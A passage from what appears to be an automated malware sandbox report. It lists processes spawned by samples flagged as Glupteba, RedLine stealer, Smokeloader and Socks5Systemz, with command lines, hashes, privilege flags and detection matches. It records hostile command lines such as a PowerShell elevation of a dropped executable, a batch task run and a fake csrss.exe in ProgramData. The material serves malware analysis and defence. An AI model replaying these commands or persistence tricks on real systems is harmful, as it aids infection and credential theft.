                                                                                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:26
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\93B.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\93B.exe"
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:431'104 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:1996A23C7C764A77CCACF5808FEC23B0
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:28
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1EB9.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\1EB9.exe
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:7'668'707 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:82BEB2A060E63C9C9A26663D0103FAE6
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                • Detection: 8%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:29
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp" /SL5="$D023E,7414031,54272,C:\Users\user\AppData\Local\Temp\1EB9.exe"
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:709'120 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:B0292A40F16BC3D5A1FE839FAC1C825A
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:30
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1EB9.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1EB9.exe" /SPAWNWND=$10464 /NOTIFYWND=$D023E
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:7'668'707 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:82BEB2A060E63C9C9A26663D0103FAE6
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:31
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp" /SL5="$20466,7414031,54272,C:\Users\user\AppData\Local\Temp\1EB9.exe" /SPAWNWND=$10464 /NOTIFYWND=$D023E
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:709'120 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:B0292A40F16BC3D5A1FE839FAC1C825A
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:31
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:31
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x410000
                                                                                                                                                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:32
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 1424
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x410000
                                                                                                                                                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:34
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -i
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:3'047'424 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:29DEB5EE2C07F1E8660E10AB6E4A0966
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:34
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\356F.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\356F.exe
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0xfe0000
                                                                                                                                                                                                                                                                                                                                                                File size:9'104'384 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:CEAE65EE17FF158877706EDFE2171501
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                                                • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\356F.exe, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:35
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:35
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -s
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:3'047'424 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:29DEB5EE2C07F1E8660E10AB6E4A0966
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 0000001D.00000002.4637171464.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 0000001D.00000002.4668833008.00000000028E1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:36
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:4'315'536 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:D122F827C4FC73F9A06D7F6F2D08CD95
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001E.00000002.2687018524.0000000003393000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001E.00000002.2677016530.0000000000843000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001E.00000002.2687018524.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001E.00000002.2686652141.0000000002B4F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                • Detection: 51%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:36
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:2'123'218 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:28B72E7425D6D224C060D3CF439C668C
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                • Detection: 61%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:36
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\FourthX.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\FourthX.exe"
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7d2c60000
                                                                                                                                                                                                                                                                                                                                                                File size:2'654'720 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:B03886CB64C04B828B6EC1B2487DF4A4
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                • Detection: 88%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:36
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:36
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:37
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:4'979'200 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:5E94F0F6265F9E8B2F706F1D46BBD39E
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000023.00000000.2524392182.0000000000401000.00000020.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                • Detection: 21%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:37
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\Drivers\csrss.exe"
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:1'998'848 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:151E9EC4F0355D2F131B871671BD5E20
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000024.00000002.2584664956.0000000002800000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:38
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\Drivers\csrss.exe"
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:1'998'848 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:151E9EC4F0355D2F131B871671BD5E20
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:41
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:41
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:43
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:chcp 1251
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x500000
                                                                                                                                                                                                                                                                                                                                                                File size:12'800 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:43
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\FourthX.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\FourthX.exe"
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7d2c60000
                                                                                                                                                                                                                                                                                                                                                                File size:2'654'720 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:B03886CB64C04B828B6EC1B2487DF4A4
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:43
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
